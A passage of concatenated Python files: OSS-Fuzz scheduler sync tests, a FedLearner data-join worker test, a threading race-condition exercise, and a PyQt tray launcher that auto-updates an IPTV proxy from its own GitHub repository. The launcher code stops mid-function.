"""Set yaml_contents."""
self.decoded_content = decoded_content
class CloudSchedulerClient:
"""Mocking cloud scheduler client."""
def __init__(self):
self.schedulers = []
# pylint: disable=no-self-use
def location_path(self, project_id, location_id):
"""Return project path."""
return 'projects/{}/location/{}'.format(project_id, location_id)
def create_job(self, parent, job):
"""Simulate create job."""
del parent
if job['name'] not in self.schedulers:
self.schedulers.append(job)
# pylint: disable=no-self-use
def job_path(self, project_id, location_id, name):
"""Return job path."""
return 'projects/{}/location/{}/jobs/{}'.format(project_id, location_id,
name)
def delete_job(self, name):
"""Simulate delete jobs."""
for job in self.schedulers:
if job['name'] == name:
self.schedulers.remove(job)
break
def update(self, job, update_mask):
"""Simulate update jobs."""
for existing_job in self.schedulers:
if existing_job == job:
job['schedule'] = update_mask['schedule']
class TestDataSync(unittest.TestCase):
"""Unit tests for sync."""
@classmethod
def setUpClass(cls):
ds_emulator = start_datastore_emulator()
_wait_for_emulator_ready(ds_emulator, 'datastore',
_DATASTORE_READY_INDICATOR)
os.environ['DATASTORE_EMULATOR_HOST'] = 'localhost:' + str(
_DATASTORE_EMULATOR_PORT)
os.environ['GOOGLE_CLOUD_PROJECT'] = _TEST_PROJECT_ID
os.environ['DATASTORE_DATASET'] = _TEST_PROJECT_ID
os.environ['GCP_PROJECT'] = 'test-project'
os.environ['FUNCTION_REGION'] = 'us-central1'
def setUp(self):
req = requests.post(
'http://localhost:{}/reset'.format(_DATASTORE_EMULATOR_PORT))
req.raise_for_status()
def test_sync_projects_update(self):
"""Testing sync_projects() updating a schedule."""
client = ndb.Client()
cloud_scheduler_client = CloudSchedulerClient()
with client.context():
Project(name='test1', schedule='0 8 * * *').put()
Project(name='test2', schedule='0 9 * * *').put()
projects = {
'test1': ProjectMetadata('0 8 * * *'),
'test2': ProjectMetadata('0 7 * * *')
}
sync_projects(cloud_scheduler_client, projects)
projects_query = Project.query()
self.assertEqual({
'test1': '0 8 * * *',
'test2': '0 7 * * *'
}, {project.name: project.schedule for project in projects_query})
def test_sync_projects_create(self):
""""Testing sync_projects() creating new schedule."""
client = ndb.Client()
cloud_scheduler_client = CloudSchedulerClient()
with client.context():
Project(name='test1', schedule='0 8 * * *').put()
projects = {
'test1': ProjectMetadata('0 8 * * *'),
'test2': ProjectMetadata('0 7 * * *')
}
sync_projects(cloud_scheduler_client, projects)
projects_query = Project.query()
self.assertEqual({
'test1': '0 8 * * *',
'test2': '0 7 * * *'
}, {project.name: project.schedule for project in projects_query})
def test_sync_projects_delete(self):
"""Testing sync_projects() deleting."""
client = ndb.Client()
cloud_scheduler_client = CloudSchedulerClient()
with client.context():
Project(name='test1', schedule='0 8 * * *').put()
Project(name='test2', schedule='0 9 * * *').put()
projects = {'test1': ProjectMetadata('0 8 * * *')}
sync_projects(cloud_scheduler_client, projects)
projects_query = Project.query()
self.assertEqual(
{'test1': '0 8 * * *'},
{project.name: project.schedule for project in projects_query})
def test_get_projects_yaml(self):
"""Testing get_projects() yaml get_schedule()."""
repo = Repository('oss-fuzz', 'dir', 'projects', [
Repository('test0', 'dir', 'projects/test0', [
Repository('Dockerfile', 'file', 'projects/test0/Dockerfile'),
Repository('project.yaml', 'file', 'projects/test0/project.yaml')
]),
Repository('test1', 'dir', 'projects/test1', [
Repository('Dockerfile', 'file', 'projects/test1/Dockerfile'),
Repository('project.yaml', 'file', 'projects/test1/project.yaml')
])
])
repo.contents[0].contents[1].set_yaml_contents(b'builds_per_day: 2')
repo.contents[1].contents[1].set_yaml_contents(b'builds_per_day: 3')
self.assertEqual(
get_projects(repo), {
'test0': ProjectMetadata('0 6,18 * * *'),
'test1': ProjectMetadata('0 6,14,22 * * *')
})
def test_get_projects_no_docker_file(self):
"""Testing get_projects() with missing dockerfile"""
repo = Repository('oss-fuzz', 'dir', 'projects', [
Repository('test0', 'dir', 'projects/test0', [
Repository('Dockerfile', 'file', 'projects/test0/Dockerfile'),
Repository('project.yaml', 'file', 'projects/test0/project.yaml')
]),
Repository('test1', 'dir', 'projects/test1')
])
self.assertEqual(get_projects(repo),
{'test0': ProjectMetadata('0 6 * * *')})
def test_get_projects_invalid_project_name(self):
"""Testing get_projects() with invalid project name"""
repo = Repository('oss-fuzz', 'dir', 'projects', [
Repository('test0', 'dir', 'projects/test0', [
Repository('Dockerfile', 'file', 'projects/test0/Dockerfile'),
Repository('project.yaml', 'file', 'projects/test0/project.yaml')
]),
Repository('test1@', 'dir', 'projects/test1', [
Repository('Dockerfile', 'file', 'projects/test1/Dockerfile'),
Repository('project.yaml', 'file', 'projects/test0/project.yaml')
])
])
self.assertEqual(get_projects(repo),
{'test0': ProjectMetadata('0 6 * * *')})
def test_get_projects_non_directory_type_project(self):
"""Testing get_projects() when a file in projects/ is not of type 'dir'."""
repo = Repository('oss-fuzz', 'dir', 'projects', [
Repository('test0', 'dir', 'projects/test0', [
Repository('Dockerfile', 'file', 'projects/test0/Dockerfile'),
Repository('project.yaml', 'file', 'projects/test0/project.yaml')
]),
Repository('test1', 'file', 'projects/test1')
])
self.assertEqual(get_projects(repo),
{'test0': ProjectMetadata('0 6 * * *')})
def test_invalid_yaml_format(self):
"""Testing invalid yaml schedule parameter argument."""
repo = Repository('oss-fuzz', 'dir', 'projects', [
Repository('test0', 'dir', 'projects/test0', [
Repository('Dockerfile', 'file', 'projects/test0/Dockerfile'),
Repository('project.yaml', 'file', 'projects/test0/project.yaml')
])
])
repo.contents[0].contents[1].set_yaml_contents(
b'builds_per_day: some-string')
self.assertEqual(get_projects(repo), {})
def test_yaml_out_of_range(self):
"""Testing invalid yaml schedule parameter argument."""
repo = Repository('oss-fuzz', 'dir', 'projects', [
Repository('test0', 'dir', 'projects/test0', [
Repository('Dockerfile', 'file', 'projects/test0/Dockerfile'),
Repository('project.yaml', 'file', 'projects/test0/project.yaml')
])
])
repo.contents[0].contents[1].set_yaml_contents(b'builds_per_day: 5')
self.assertEqual(get_projects(repo), {})
def test_get_access_token(self):
"""Testing get_access_token()."""
client = ndb.Client()
with client.context():
self.assertRaises(RuntimeError, get_access_token)
@classmethod
def tearDownClass(cls):
# TODO: replace this with a cleaner way of killing the process
os.system('pkill -f datastore')
if __name__ == '__main__':
unittest.main(exit=False)
|
wd.py
|
"""
MDH backend containers healthcheck worker
"""
import threading
from worker import elsa_docker_event_worker, elsa_health_check_worker
if __name__ == '__main__':
elsa_docker_worker = threading.Thread(target=elsa_docker_event_worker)
elsa_docker_worker.start()
elsa_health_check_worker()
|
exercise_2.py
|
import threading
from exercises.utils import fuzzy
rabbits_colony_size: int = 0
def rabbit_counter(number_of_rabbits: int):
global rabbits_colony_size
fuzzy()
rabbits_colony_size += number_of_rabbits
fuzzy()
print(f'Now we have {rabbits_colony_size} rabbits')
fuzzy()
print('---------------')
fuzzy()
for _ in range(10):
threading.Thread(target=rabbit_counter, args=[1]).start()
fuzzy()
print('All rabbits are counted')
fuzzy()
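# Editor's note (sketch, not part of the original exercise): the "+=" on
# rabbits_colony_size is not atomic, so the ten threads above race with each other and the
# final count can come out wrong. A thread-safe variant would guard the counter, e.g.:
#
#     counter_lock = threading.Lock()
#
#     def safe_rabbit_counter(number_of_rabbits: int):
#         global rabbits_colony_size
#         with counter_lock:
#             rabbits_colony_size += number_of_rabbits
#
# and the main code would join the threads before printing the final total.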
|
test_data_join_worker.py
|
# Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
import os
import threading
from os import listdir
from os.path import isfile, join
import time
import random
import logging
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import unittest
import tensorflow.compat.v1 as tf
tf.enable_eager_execution()
import numpy as np
import tensorflow_io
from tensorflow.compat.v1 import gfile
from google.protobuf import text_format, empty_pb2, timestamp_pb2
import grpc
from fedlearner.common import common_pb2 as common_pb
from fedlearner.common import data_join_service_pb2 as dj_pb
from fedlearner.common import data_join_service_pb2_grpc as dj_grpc
from fedlearner.common.mysql_client import DBClient
from fedlearner.proxy.channel import make_insecure_channel, ChannelType
from fedlearner.data_join import (
data_block_manager, common,
data_join_master, data_join_worker,
raw_data_visitor, raw_data_publisher
)
from fedlearner.data_join.data_block_manager import DataBlockBuilder
from fedlearner.data_join.raw_data_iter_impl.tf_record_iter import TfExampleItem
class DataJoinWorker(unittest.TestCase):
def setUp(self):
db_database = 'test_mysql'
db_addr = 'localhost:2379'
db_username_l = 'test_user_l'
db_username_f = 'test_user_f'
db_password_l = 'test_password_l'
db_password_f = 'test_password_f'
db_base_dir_l = 'byefl_l'
        db_base_dir_f = 'byefl_f'
data_source_name = 'test_data_source'
kvstore_l = DBClient(db_database, db_addr, db_username_l,
db_password_l, db_base_dir_l, True)
kvstore_f = DBClient(db_database, db_addr, db_username_f,
db_password_f, db_base_dir_f, True)
kvstore_l.delete_prefix(common.data_source_kvstore_base_dir(data_source_name))
kvstore_f.delete_prefix(common.data_source_kvstore_base_dir(data_source_name))
data_source_l = common_pb.DataSource()
self.raw_data_pub_dir_l = './raw_data_pub_dir_l'
data_source_l.raw_data_sub_dir = self.raw_data_pub_dir_l
data_source_l.role = common_pb.FLRole.Leader
data_source_l.state = common_pb.DataSourceState.Init
data_source_l.output_base_dir = "./ds_output_l"
self.raw_data_dir_l = "./raw_data_l"
data_source_f = common_pb.DataSource()
self.raw_data_pub_dir_f = './raw_data_pub_dir_f'
data_source_f.role = common_pb.FLRole.Follower
data_source_f.raw_data_sub_dir = self.raw_data_pub_dir_f
data_source_f.state = common_pb.DataSourceState.Init
data_source_f.output_base_dir = "./ds_output_f"
self.raw_data_dir_f = "./raw_data_f"
data_source_meta = common_pb.DataSourceMeta()
data_source_meta.name = data_source_name
data_source_meta.partition_num = 2
data_source_meta.start_time = 0
data_source_meta.end_time = 100000000
data_source_l.data_source_meta.MergeFrom(data_source_meta)
common.commit_data_source(kvstore_l, data_source_l)
data_source_f.data_source_meta.MergeFrom(data_source_meta)
common.commit_data_source(kvstore_f, data_source_f)
self.kvstore_l = kvstore_l
self.kvstore_f = kvstore_f
self.data_source_l = data_source_l
self.data_source_f = data_source_f
self.data_source_name = data_source_name
self.db_database = db_database
self.db_addr = db_addr
self.db_username_l = db_username_l
self.db_username_f = db_username_f
self.db_password_l = db_password_l
self.db_password_f = db_password_f
self.db_base_dir_l = db_base_dir_l
self.db_base_dir_f = db_base_dir_f
self.raw_data_publisher_l = raw_data_publisher.RawDataPublisher(
self.kvstore_l, self.raw_data_pub_dir_l
)
self.raw_data_publisher_f = raw_data_publisher.RawDataPublisher(
self.kvstore_f, self.raw_data_pub_dir_f
)
if gfile.Exists(data_source_l.output_base_dir):
gfile.DeleteRecursively(data_source_l.output_base_dir)
if gfile.Exists(self.raw_data_dir_l):
gfile.DeleteRecursively(self.raw_data_dir_l)
if gfile.Exists(data_source_f.output_base_dir):
gfile.DeleteRecursively(data_source_f.output_base_dir)
if gfile.Exists(self.raw_data_dir_f):
gfile.DeleteRecursively(self.raw_data_dir_f)
self.worker_options = dj_pb.DataJoinWorkerOptions(
use_mock_etcd=True,
raw_data_options=dj_pb.RawDataOptions(
raw_data_iter='TF_RECORD',
read_ahead_size=1<<20,
read_batch_size=128
),
example_id_dump_options=dj_pb.ExampleIdDumpOptions(
example_id_dump_interval=1,
example_id_dump_threshold=1024
),
example_joiner_options=dj_pb.ExampleJoinerOptions(
example_joiner='STREAM_JOINER',
min_matching_window=64,
max_matching_window=256,
data_block_dump_interval=30,
data_block_dump_threshold=1000
),
batch_processor_options=dj_pb.BatchProcessorOptions(
batch_size=512,
max_flying_item=2048
),
data_block_builder_options=dj_pb.WriterOptions(
output_writer='TF_RECORD'
)
)
self.total_index = 1 << 12
def generate_raw_data(self, start_index, kvstore, rdp, data_source, raw_data_base_dir, partition_id,
block_size, shuffle_win_size, feat_key_fmt, feat_val_fmt):
dbm = data_block_manager.DataBlockManager(data_source, partition_id)
raw_data_dir = os.path.join(raw_data_base_dir,
common.partition_repr(partition_id))
if not gfile.Exists(raw_data_dir):
gfile.MakeDirs(raw_data_dir)
useless_index = 0
new_raw_data_fnames = []
for block_index in range(start_index // block_size, (start_index + self.total_index) // block_size):
builder = DataBlockBuilder(
raw_data_base_dir,
data_source.data_source_meta.name,
partition_id, block_index,
dj_pb.WriterOptions(output_writer='TF_RECORD'), None
)
cands = list(range(block_index * block_size, (block_index + 1) * block_size))
start_index = cands[0]
for i in range(len(cands)):
if random.randint(1, 4) > 2:
continue
a = random.randint(i - shuffle_win_size, i + shuffle_win_size)
b = random.randint(i - shuffle_win_size, i + shuffle_win_size)
if a < 0:
a = 0
if a >= len(cands):
a = len(cands) - 1
if b < 0:
b = 0
if b >= len(cands):
b = len(cands) - 1
if (abs(cands[a]-i-start_index) <= shuffle_win_size and
abs(cands[b]-i-start_index) <= shuffle_win_size):
cands[a], cands[b] = cands[b], cands[a]
for example_idx in cands:
feat = {}
example_id = '{}'.format(example_idx).encode()
feat['example_id'] = tf.train.Feature(
bytes_list=tf.train.BytesList(value=[example_id]))
event_time = 150000000 + example_idx
feat['event_time'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=[event_time]))
feat[feat_key_fmt.format(example_idx)] = tf.train.Feature(
bytes_list=tf.train.BytesList(
value=[feat_val_fmt.format(example_idx).encode()]))
example = tf.train.Example(features=tf.train.Features(feature=feat))
builder.append_item(TfExampleItem(example.SerializeToString()),
useless_index, useless_index)
useless_index += 1
meta = builder.finish_data_block()
fname = common.encode_data_block_fname(
data_source.data_source_meta.name,
meta
)
new_raw_data_fnames.append(os.path.join(raw_data_dir, fname))
fpaths = [os.path.join(raw_data_dir, f)
for f in gfile.ListDirectory(raw_data_dir)
if not gfile.IsDirectory(os.path.join(raw_data_dir, f))]
for fpath in fpaths:
if fpath.endswith(common.DataBlockMetaSuffix):
gfile.Remove(fpath)
rdp.publish_raw_data(partition_id, new_raw_data_fnames)
def test_all_assembly(self):
for i in range(3):
logging.info('Testing round %d', i + 1)
self._inner_test_round(i*self.total_index)
def _inner_test_round(self, start_index):
for i in range(self.data_source_l.data_source_meta.partition_num):
self.generate_raw_data(
start_index, self.kvstore_l, self.raw_data_publisher_l,
self.data_source_l, self.raw_data_dir_l, i, 2048, 64,
'leader_key_partition_{}'.format(i) + ':{}',
'leader_value_partition_{}'.format(i) + ':{}'
)
self.generate_raw_data(
start_index, self.kvstore_f, self.raw_data_publisher_f,
self.data_source_f, self.raw_data_dir_f, i, 4096, 128,
'follower_key_partition_{}'.format(i) + ':{}',
'follower_value_partition_{}'.format(i) + ':{}'
)
master_addr_l = 'localhost:4061'
master_addr_f = 'localhost:4062'
master_options = dj_pb.DataJoinMasterOptions(use_mock_etcd=True,
batch_mode=True)
master_l = data_join_master.DataJoinMasterService(
int(master_addr_l.split(':')[1]), master_addr_f,
self.data_source_name, self.db_database, self.db_base_dir_l,
self.db_addr, self.db_username_l, self.db_password_l,
master_options,
)
master_l.start()
master_f = data_join_master.DataJoinMasterService(
int(master_addr_f.split(':')[1]), master_addr_l,
self.data_source_name, self.db_database, self.db_base_dir_f,
self.db_addr, self.db_username_f, self.db_password_f,
master_options
)
master_f.start()
channel_l = make_insecure_channel(master_addr_l, ChannelType.INTERNAL)
master_client_l = dj_grpc.DataJoinMasterServiceStub(channel_l)
channel_f = make_insecure_channel(master_addr_f, ChannelType.INTERNAL)
master_client_f = dj_grpc.DataJoinMasterServiceStub(channel_f)
while True:
try:
req_l = dj_pb.DataSourceRequest(
data_source_meta=self.data_source_l.data_source_meta
)
req_f = dj_pb.DataSourceRequest(
data_source_meta=self.data_source_f.data_source_meta
)
dss_l = master_client_l.GetDataSourceStatus(req_l)
dss_f = master_client_f.GetDataSourceStatus(req_f)
self.assertEqual(dss_l.role, common_pb.FLRole.Leader)
self.assertEqual(dss_f.role, common_pb.FLRole.Follower)
if dss_l.state == common_pb.DataSourceState.Processing and \
dss_f.state == common_pb.DataSourceState.Processing:
break
except Exception as e:
pass
time.sleep(2)
worker_addr_l = 'localhost:4161'
worker_addr_f = 'localhost:4162'
worker_l = data_join_worker.DataJoinWorkerService(
int(worker_addr_l.split(':')[1]),
worker_addr_f, master_addr_l, 0,
self.db_database, self.db_base_dir_l,
self.db_addr, self.db_username_l,
self.db_password_l, self.worker_options
)
worker_f = data_join_worker.DataJoinWorkerService(
int(worker_addr_f.split(':')[1]),
worker_addr_l, master_addr_f, 0,
self.db_database, self.db_base_dir_f,
self.db_addr, self.db_username_f,
self.db_password_f, self.worker_options
)
th_l = threading.Thread(target=worker_l.run, name='worker_l')
th_f = threading.Thread(target=worker_f.run, name='worker_f')
th_l.start()
th_f.start()
while True:
try:
req_l = dj_pb.DataSourceRequest(
data_source_meta=self.data_source_l.data_source_meta
)
req_f = dj_pb.DataSourceRequest(
data_source_meta=self.data_source_f.data_source_meta
)
dss_l = master_client_l.GetDataSourceStatus(req_l)
dss_f = master_client_f.GetDataSourceStatus(req_f)
self.assertEqual(dss_l.role, common_pb.FLRole.Leader)
self.assertEqual(dss_f.role, common_pb.FLRole.Follower)
if dss_l.state == common_pb.DataSourceState.Ready and \
dss_f.state == common_pb.DataSourceState.Ready:
break
            except Exception:
pass
time.sleep(2)
th_l.join()
th_f.join()
master_l.stop()
master_f.stop()
def tearDown(self):
if gfile.Exists(self.data_source_l.output_base_dir):
gfile.DeleteRecursively(self.data_source_l.output_base_dir)
if gfile.Exists(self.raw_data_dir_l):
gfile.DeleteRecursively(self.raw_data_dir_l)
if gfile.Exists(self.data_source_f.output_base_dir):
gfile.DeleteRecursively(self.data_source_f.output_base_dir)
if gfile.Exists(self.raw_data_dir_f):
gfile.DeleteRecursively(self.raw_data_dir_f)
self.kvstore_f.delete_prefix(common.data_source_kvstore_base_dir(self.db_base_dir_f))
self.kvstore_l.delete_prefix(common.data_source_kvstore_base_dir(self.db_base_dir_l))
if __name__ == '__main__':
unittest.main()
|
sstvLauncher.py
|
import sys, signal, os, urllib, urllib.request, subprocess, json, logging, ntpath, platform, requests, shutil, threading, multiprocessing
from PyQt4 import QtGui, QtCore
if platform.system() == 'Linux': print("To run without terminal launch using 'nohup ./sstvLauncher &'")
from logging.handlers import RotatingFileHandler
# Setup logging
log_formatter = logging.Formatter(
'%(asctime)s - %(levelname)-10s - %(name)-10s - %(funcName)-25s- %(message)s')
logger = logging.getLogger('SmoothStreamsLauncher ')
logger.setLevel(logging.DEBUG)
logging.getLogger('werkzeug').setLevel(logging.ERROR)
# Console logging
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.DEBUG)
console_handler.setFormatter(log_formatter)
logger.addHandler(console_handler)
# Rotating Log Files
if not os.path.isdir(os.path.join(os.path.dirname(sys.argv[0]), 'cache')):
os.mkdir(os.path.join(os.path.dirname(sys.argv[0]), 'cache'))
file_handler = RotatingFileHandler(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'status.log'),
maxBytes=1024 * 1024 * 2,
backupCount=5)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(log_formatter)
logger.addHandler(file_handler)
class SystemTrayIcon(QtGui.QSystemTrayIcon):
def __init__(self, icon, parent=None):
self.initVariables()
QtGui.QSystemTrayIcon.__init__(self,icon,parent)
self.menu = QtGui.QMenu(parent)
self.createMenu()
self.setContextMenu(self.menu)
self.set_icon()
if self.start:
logger.info("Launching YAP!")
self.tray_start()
else:
logger.info("not launching")
def createMenu(self,update=False):
if update: self.menu.clear()
if self.start:
openAction = self.menu.addAction('Open YAP')
QtCore.QObject.connect(openAction, QtCore.SIGNAL('triggered()'), self.tray_open)
terminalAction = self.menu.addAction('Show Terminal')
QtCore.QObject.connect(terminalAction, QtCore.SIGNAL('triggered()'), self.showTerminal)
else:
startAction = self.menu.addAction('Start YAP')
QtCore.QObject.connect(startAction, QtCore.SIGNAL('triggered()'), self.tray_restart)
self.menu.addSeparator()
checkAction = self.menu.addAction('Check for Updates')
QtCore.QObject.connect(checkAction, QtCore.SIGNAL('triggered()'), self.tray_check_update)
updateAction = self.menu.addAction('Update')
QtCore.QObject.connect(updateAction, QtCore.SIGNAL('triggered()'), self.tray_update)
if self.start:
restartAction = self.menu.addAction('Restart YAP')
QtCore.QObject.connect(restartAction, QtCore.SIGNAL('triggered()'), self.tray_restart)
branchAction = self.menu.addAction('Switch Master/Dev')
QtCore.QObject.connect(branchAction, QtCore.SIGNAL('triggered()'), self.tray_branch)
logAction = self.menu.addAction('Open Logs')
QtCore.QObject.connect(logAction, QtCore.SIGNAL('triggered()'), self.tray_logs)
cacheAction = self.menu.addAction('Clear Cache')
QtCore.QObject.connect(cacheAction, QtCore.SIGNAL('triggered()'), self.tray_cache)
exitAction = self.menu.addAction('Exit')
QtCore.QObject.connect(exitAction, QtCore.SIGNAL('triggered()'), self.on_exit)
def initVariables(self):
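# Set defaults, then try to restore version/type/branch from launcher.json and verify
# the install; on any failure, download the tray icons and auto-detect the install type.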
self.type = ""
self.version = float("0.0")
self.latestVersion = float("0.0")
# Branch Master = True
self.branch = True
self.yap = None
self.LISTEN_IP = '127.0.0.1'
self.LISTEN_PORT = 6969
self.SERVER_HOST = "http://" + self.LISTEN_IP + ":" + str(self.LISTEN_PORT)
self.start = False
self.validIcon = QtGui.QIcon("logo_tray.ico")
self.updateIcon = QtGui.QIcon("logo_tray-update.ico")
try:
logger.debug("Parsing settings")
with open(os.path.join(os.path.dirname(sys.argv[0]), 'launcher.json')) as jsonConfig:
config = {}
config = json.load(jsonConfig)
if "version" in config:
self.version = config["version"]
if "type" in config:
self.type = config["type"]
if "branch" in config:
self.branch = config["branch"] == True
self.assign_latestFile()
self.check_install()
self.start = True
except:
urllib.request.urlretrieve('https://raw.githubusercontent.com/vorghahn/sstvProxy/master/logo_tray.ico',
os.path.join(os.path.dirname(sys.argv[0]), 'logo_tray.ico'))
urllib.request.urlretrieve(
'https://raw.githubusercontent.com/vorghahn/sstvProxy/master/logo_tray-update.ico',
os.path.join(os.path.dirname(sys.argv[0]), 'logo_tray-update.ico'))
self.detect_install()
self.assign_latestFile()
self.version = float(self.version)
logger.debug("Settings complete")
return
def closeEvent(self, event):
if self.okayToClose():
#user asked for exit
self.trayIcon.hide()
event.accept()
else:
#"minimize"
self.hide()
self.trayIcon.show() #thanks @mojo
event.ignore()
def __icon_activated(self, reason):
if reason in (QtGui.QSystemTrayIcon.Trigger, QtGui.QSystemTrayIcon.DoubleClick):
logger.info("double clicked")
self.show()
def on_exit(self):
if self.yap: self.yap.terminate()
self.exit()
def exit(self):
QtCore.QCoreApplication.exit()
def showTerminal(self):
import time
import select
if platform.system() == 'Linux':
#subprocess.Popen(args, stdout=subprocess.PIPE)
try:
subprocess.Popen(["gnome-terminal -e 'bash -c \"tail -F ./nohup.out; exec bash\"'"], shell=True)
except:
subprocess.Popen(["lxterminal -e 'bash -c \"tail -F ./nohup.out; exec bash\"'"], shell=True)
return
f = subprocess.Popen(['tail','-F','nohup.out'], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
p = select.poll()
p.register(f.stdout)
while True:
if p.poll(1):
print(f.stdout.readline())
time.sleep(1)
elif platform.system() == 'Windows':
pass # terminal output viewer not implemented on Windows
elif platform.system() == 'Darwin':
pass # terminal output viewer not implemented on macOS
def gather_yap(self):
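# Read the proxy's proxysettings.json (if present) to pick up the IP/port its web UI
# listens on and rebuild SERVER_HOST accordingly.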
if not os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'proxysettings.json')):
logger.debug("No config file found.")
try:
logger.debug("Parsing settings")
with open(os.path.join(os.path.dirname(sys.argv[0]), 'proxysettings.json')) as jsonConfig:
config = {}
config = json.load(jsonConfig)
if "ip" in config and "port" in config:
self.LISTEN_IP = config["ip"]
self.LISTEN_PORT = config["port"]
self.SERVER_HOST = "http://" + self.LISTEN_IP + ":" + str(self.LISTEN_PORT)
logger.debug("Using config file.")
except:
pass
def tray_update(self):
if self.version < self.latestVersion:
# todo make update link
self.shutdown(update=True, restart=True)
self.set_icon()
else:
icon = os.path.join(os.path.dirname(sys.argv[0]), 'logo_tray.ico')
hover_text = 'YAP' + ' - No Update Available'
self.set_icon()
def set_icon(self):
logger.info("set icon")
if self.version < self.latestVersion:
icon = os.path.abspath('logo_tray-update.ico')
hover_text = 'YAP' + ' - Update Available!'
self.setIcon(self.updateIcon)
else:
icon = os.path.abspath('logo_tray.ico')
hover_text = 'YAP'
self.setIcon(self.validIcon)
logger.info("icon 2")
return
def detect_install(self):
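# Work out which build of the proxy is present (python script or per-platform
# executable); if none is found, trigger a fresh install.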
logger.info("Detect install")
if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvProxy.py')):
logger.info("Detect python")
self.type = ""
return
elif platform.system() == 'Linux':
self.type = "Linux/"
if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvProxy')):
logger.info("Detect linux exe")
return
elif platform.system() == 'Windows':
self.type = "Windows/"
if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvproxy.exe')):
logger.info("Detect win exe")
return
elif platform.system() == 'Darwin':
self.type = "Macintosh/"
if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvproxy')):
logger.info("Detect mac exe")
return
logger.info('installing')
self.assign_latestFile()
self.shutdown(update=True, install=True)
def check_install(self):
logger.debug("Check install")
if self.type == "" and os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvProxy.py')):
return
elif self.type == "Linux/" and platform.system() == 'Linux' and os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvProxy')):
return
elif self.type == "Windows/" and platform.system() == 'Windows'and os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvproxy.exe')):
return
elif self.type == "Macintosh/" and platform.system() == 'Darwin' and os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'sstvproxy')):
return
logger.info('Installing YAP %s' % self.type)
self.assign_latestFile()
self.shutdown(update=True)
def assign_latestFile(self):
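# Pick the download URL template for the current install type and fetch the latest
# published version number from GitHub (falls back to 0.0 if the check fails).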
if self.type == "": self.latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/{branch}/sstvProxy.py"
elif self.type == "Linux/": self.latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/{branch}/Linux/sstvProxy"
elif self.type == "Windows/": self.latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/{branch}/Windows/sstvproxy.exe"
elif self.type == "Macintosh/": self.latestfile = "https://raw.githubusercontent.com/vorghahn/sstvProxy/{branch}/Macintosh/sstvproxy"
self.url = "https://raw.githubusercontent.com/vorghahn/sstvProxy/master/%sversion.txt" % self.type
try:
self.latestVersion = float(requests.get(self.url).json()['Version'])
except:
self.latestVersion = float(0.0)
logger.info("Latest version check failed, check internet.")
logger.info(self.url)
def tray_open(self):
self.launch_browser()
def tray_check_update(self):
try:
latest_ver = float(json.loads(urllib.request.urlopen(self.url).read().decode('utf-8'))['Version'])
except:
latest_ver = float(0.0)
logger.info("Latest version check failed, check internet.")
if self.version < latest_ver:
logger.info("Update Available. You are on v%s with v%s available." % (self.version, latest_ver))
else:
logger.info("Proxy is up to date!")
def save_data(self):
logger.info("Saving data")
config = {'version':self.version,'type':self.type,'branch':self.branch}
with open(os.path.join(os.path.dirname(sys.argv[0]), 'launcher.json'), 'w') as fp:
json.dump(config, fp)
def tray_start(self):
if self.type == "":
import sstvProxy
self.yap = multiprocessing.Process(target=sstvProxy.main)
self.yap.start()
elif self.type == "Linux/": subprocess.Popen(os.path.abspath("sstvProxy"), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
#elif self.type == "Linux/": os.spawnl(sys.executable, os.path.abspath("sstvProxy"))
elif self.type == "Windows/": subprocess.Popen([".\sstvproxy.exe", "-d"], cwd=os.getcwd())
elif self.type == "Macintosh/": subprocess.Popen(os.path.abspath("sstvproxy"), stdout=subprocess.PIPE,stderr=subprocess.PIPE) #os.execv(sys.executable, ["./sstvproxy", "-d"])
self.start = True
self.createMenu(True)
def tray_restart(self):
self.shutdown(restart=True)
def tray_quit(self):
self.shutdown()
def tray_cache(self):
shutil.rmtree(os.path.join(os.path.dirname(sys.argv[0]), 'cache'), ignore_errors=True)
def tray_logs(self):
try:
import webbrowser
webbrowser.open(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'status.log'))
except Exception as e:
logger.error(u"Could not open logs: %s" % e)
def tray_branch(self):
self.branch = not self.branch
self.shutdown(update=True, restart=True)
def launch_browser(self):
try:
import webbrowser
self.gather_yap()
webbrowser.open('%s%s' % (self.SERVER_HOST,'/sstv/index.html'))
except Exception as e:
logger.error(u"Could not launch browser: %s" % e)
def shutdown(self, restart=False, update=False, install=False):
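# Stop the running proxy (platform-specific kill), optionally download the latest build
# for the selected branch and persist launcher.json, then restart if requested.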
logger.info(u"Stopping YAP web server...")
if self.type == 'Windows/':
os.system("taskkill /F /im sstvProxy.exe")
elif self.type == 'Linux/':
import psutil
PROCNAME = "sstvProxy"
for proc in psutil.process_iter():
# check whether the process name matches
if proc.name() == PROCNAME:
proc.kill()
elif self.type == 'Macintosh/':
import psutil
PROCNAME = "sstvproxy"
for proc in psutil.process_iter():
# check whether the process name matches
if proc.name() == PROCNAME:
proc.kill()
elif self.yap:
self.yap.terminate()
self.yap = None
if update:
logger.info(u"YAP is updating...")
url = self.latestfile.format(branch='master' if self.branch else 'dev')
try:
newfilename = ntpath.basename(url)
